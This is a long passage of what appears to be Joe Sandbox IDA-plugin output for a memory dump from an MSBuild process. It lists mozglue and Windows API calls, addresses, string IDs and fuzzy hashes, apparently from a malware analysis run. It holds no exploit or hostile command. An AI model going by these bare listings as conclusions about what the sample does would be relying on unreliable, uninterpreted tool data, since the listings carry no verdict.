                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8E14C5
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8E14E2
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8E1546
                                                                                                                                                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6C8E15BA
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8E16B4
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1909280232-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C8DC1F1
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C8DC293
                                                                                                                                                                                                                      • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C8DC29E
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: fgetc$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1522623862-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8D9FDB
                                                                                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6C8D9FF0
                                                                                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6C8DA006
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8DA0BE
                                                                                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6C8DA0D5
                                                                                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6C8DA0EB
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 956590011-0
                                                                                                                                                                                                                      • Opcode ID: 962619fc14a807ea9fe6662ac103f5653f2e15304504b9dc73f90c536447b78a
                                                                                                                                                                                                                      • Instruction ID: 3ee85c39e64b96df11a7d4fb43026a2fc47ee1db4f67d3893d406680cf30308d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 962619fc14a807ea9fe6662ac103f5653f2e15304504b9dc73f90c536447b78a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B61A075508701DFC721CF58C58059AB3F5FF88328F558A69E8999B702EB32E986CBC1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DDC60
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C8DD38A,?), ref: 6C8DDC6F
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,6C8DD38A,?), ref: 6C8DDCC1
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C8DD38A,?), ref: 6C8DDCE9
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C8DD38A,?), ref: 6C8DDD05
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C8DD38A,?), ref: 6C8DDD4A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1842996449-0
                                                                                                                                                                                                                      • Opcode ID: 908464e32eaaa828002ac8fb591bf7e76978e65b9e62caaae9d263dedb824c65
                                                                                                                                                                                                                      • Instruction ID: 64c5df1e937a0464753f77b9b17259bf5c751b559b87c0865548f3c9b7411e59
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 908464e32eaaa828002ac8fb591bf7e76978e65b9e62caaae9d263dedb824c65
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B416BB5A00606DFCB10CFA9C98099AB7F5FF89314B66496AD945ABB10D771FC01CFA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA80: GetCurrentThreadId.KERNEL32 ref: 6C8BFA8D
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA80: AcquireSRWLockExclusive.KERNEL32(6C90F448), ref: 6C8BFA99
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8C6727
                                                                                                                                                                                                                      • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C8C67C8
                                                                                                                                                                                                                        • Part of subcall function 6C8D4290: memcpy.VCRUNTIME140(?,?,6C8E2003,6C8E0AD9,?,6C8E0AD9,00000000,?,6C8E0AD9,?,00000004,?,6C8E1A62,?,6C8E2003,?), ref: 6C8D42C4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                      • String ID: data
                                                                                                                                                                                                                      • API String ID: 511789754-2918445923
                                                                                                                                                                                                                      • Opcode ID: 5c76cdbfd9846b3c74a32a6e0bbd120755036f4981c512c59a3962a466424477
                                                                                                                                                                                                                      • Instruction ID: a24c5e54799effa483aaea0ea705e6a0ed682b1b54371c10bbc893a5bc4834e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c76cdbfd9846b3c74a32a6e0bbd120755036f4981c512c59a3962a466424477
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD18C75B083408BD734DF28CA41BAAB7E5AFC6308F108D2DE59997B51DB30E949CB52
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C8DC82D
                                                                                                                                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C8DC842
                                                                                                                                                                                                                        • Part of subcall function 6C8DCAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C8FB5EB,00000000), ref: 6C8DCB12
                                                                                                                                                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C8DC863
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6C8DC875
                                                                                                                                                                                                                        • Part of subcall function 6C8BB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C8FB636,?), ref: 6C8BB143
                                                                                                                                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C8DC89A
                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8DC8BC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2745304114-0
                                                                                                                                                                                                                      • Opcode ID: 0f4b0329076fdd5626f929e278dee256a426fbe05b68891eec90c58976454f6c
                                                                                                                                                                                                                      • Instruction ID: 49b81bd2a92c66a8866c8731fa19d8d3af1aed03a2681f1fc84b9e01b8596851
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f4b0329076fdd5626f929e278dee256a426fbe05b68891eec90c58976454f6c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F31163B5B042099FCB00DFA4C9958AEBBB5EF89354F20052DE60697341DB30A954CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C8CDA31,00100000,?,?,00000000,?), ref: 6C8DCDA4
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                        • Part of subcall function 6C8DD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C8DCDBA,00100000,?,00000000,?,6C8CDA31,00100000,?,?,00000000,?), ref: 6C8DD158
                                                                                                                                                                                                                        • Part of subcall function 6C8DD130: InitializeConditionVariable.KERNEL32(00000098,?,6C8DCDBA,00100000,?,00000000,?,6C8CDA31,00100000,?,?,00000000,?), ref: 6C8DD177
                                                                                                                                                                                                                      • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C8CDA31,00100000,?,?,00000000,?), ref: 6C8DCDC4
                                                                                                                                                                                                                        • Part of subcall function 6C8D7480: ReleaseSRWLockExclusive.KERNEL32(?,6C8E15FC,?,?,?,?,6C8E15FC,?), ref: 6C8D74EB
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C8CDA31,00100000,?,?,00000000,?), ref: 6C8DCECC
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: mozalloc_abort.MOZGLUE(?), ref: 6C89CAA2
                                                                                                                                                                                                                        • Part of subcall function 6C8CCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C8DCEEA,?,?,?,?,00000000,?,6C8CDA31,00100000,?,?,00000000), ref: 6C8CCB57
                                                                                                                                                                                                                        • Part of subcall function 6C8CCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C8CCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C8DCEEA,?,?), ref: 6C8CCBAF
                                                                                                                                                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C8CDA31,00100000,?,?,00000000,?), ref: 6C8DD058
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • xSYpaQ0DEooxRigYYpKXFGKYCUUtGKLjGkUdqWkouFxKKXFJQMSilooAbSU6igY2jvS0lAxKKWkoGJikNOpCKAEpKdikoGIRSU6koGNIoxS0lAISilxSEUFCUGjFFADT60E0pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO, xrefs: 6C8DCD2C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                      • String ID: xSYpaQ0DEooxRigYYpKXFGKYCUUtGKLjGkUdqWkouFxKKXFJQMSilooAbSU6igY2jvS0lAxKKWkoGJikNOpCKAEpKdikoGIRSU6koGNIoxS0lAISilxSEUFCUGjFFADT60E0pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO
                                                                                                                                                                                                                      • API String ID: 861561044-1831941291
                                                                                                                                                                                                                      • Opcode ID: 48b078eed1cf260f8b8cce00bf641a71d12b09c413f5b4012ac8832d0bcfa5e8
                                                                                                                                                                                                                      • Instruction ID: 8af36a224364a06825288a33f4a20be5fe9d6f24647efcf746b0a3e899242355
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48b078eed1cf260f8b8cce00bf641a71d12b09c413f5b4012ac8832d0bcfa5e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6D17E71A04B069FD718CF28C580B99F7E1BF89308F018A2DD95987712EB71F9A5CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C88EB57,?,?,?,?,?,?,?,?,?), ref: 6C8BD652
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C88EB57,?), ref: 6C8BD660
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C88EB57,?), ref: 6C8BD673
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8BD888
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                      • String ID: |Enabled
                                                                                                                                                                                                                      • API String ID: 4142949111-2633303760
                                                                                                                                                                                                                      • Opcode ID: 7b099a2d9cc5b15df5b9c84180bbe93ce2b3b16e8dc375ffad38d322e421d384
                                                                                                                                                                                                                      • Instruction ID: 5dc09f12fe4fb8bec875260bf8e74952283c5b4c1e2395454a60ead9baf0f9ec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b099a2d9cc5b15df5b9c84180bbe93ce2b3b16e8dc375ffad38d322e421d384
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EA12770A043199FDB20CF69C5807EEBBF1AF4A318F14886DD8857B745C735A945CBA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8D0270
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D02E9
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8D02F6
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8D033A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                      • String ID: about:blank
                                                                                                                                                                                                                      • API String ID: 2047719359-258612819
                                                                                                                                                                                                                      • Opcode ID: 8397adcd2aa202fb61f7a33dd9f8e38f302e8114269eb758f578ec6f02971f52
                                                                                                                                                                                                                      • Instruction ID: 581720565fb5fb66e04553480ebcb59b900137ed65156285c22b15f6d7d279bc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8397adcd2aa202fb61f7a33dd9f8e38f302e8114269eb758f578ec6f02971f52
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E51AE75A05219CFCB10DF58C580A9AB7F1FF89328F25492DC81AA7B41D731B946CB94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CE12F
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C8CE084,00000000), ref: 6C8CE137
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C8CE196
                                                                                                                                                                                                                      • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C8CE1E9
                                                                                                                                                                                                                        • Part of subcall function 6C8C99A0: GetCurrentThreadId.KERNEL32 ref: 6C8C99C1
                                                                                                                                                                                                                        • Part of subcall function 6C8C99A0: AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8C99CE
                                                                                                                                                                                                                        • Part of subcall function 6C8C99A0: ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8C99F8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6C8CE13F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                      • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                                                                                                                                                                                      • API String ID: 2491745604-3904374701
                                                                                                                                                                                                                      • Opcode ID: 012ea508a33dee7fd960db96e15094acdeebdaff450f41f3fef021d452a332d1
                                                                                                                                                                                                                      • Instruction ID: 1805dadd3704184a5f131c4579ce108fee89420a1de11bbf4c1977dc986ee393
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 012ea508a33dee7fd960db96e15094acdeebdaff450f41f3fef021d452a332d1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E131D2B17047009BC7209F6C86413AAF7E5AFC624CF148D2EE9995BB41DB70D90AC793
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C8BF480
                                                                                                                                                                                                                        • Part of subcall function 6C88F100: LoadLibraryW.KERNEL32(shell32,?,6C8FD020), ref: 6C88F122
                                                                                                                                                                                                                        • Part of subcall function 6C88F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C88F132
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 6C8BF555
                                                                                                                                                                                                                        • Part of subcall function 6C8914B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C891248,6C891248,?), ref: 6C8914C9
                                                                                                                                                                                                                        • Part of subcall function 6C8914B0: memcpy.VCRUNTIME140(?,6C891248,00000000,?,6C891248,?), ref: 6C8914EF
                                                                                                                                                                                                                        • Part of subcall function 6C88EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C88EEE3
                                                                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 6C8BF4FD
                                                                                                                                                                                                                      • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C8BF523
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                      • String ID: \oleacc.dll
                                                                                                                                                                                                                      • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                      • Opcode ID: 1aa98614c27b84a5dde40e7b71639516d788247709aff3979324d188f208753d
                                                                                                                                                                                                                      • Instruction ID: 0d7af7eaee450d66e73a9e6359f093e22fa15deac77c2fe11c5bd44d319d3717
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aa98614c27b84a5dde40e7b71639516d788247709aff3979324d188f208753d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED418F346087109FE730DF69CA84A9BB7F4AF95318F504E2CF59193750EB30D9898B92
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CE047
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CE04F
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8CE09C
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8CE0B0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_get_profile, xrefs: 6C8CE057
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                      • String ID: [I %d/%d] profiler_get_profile
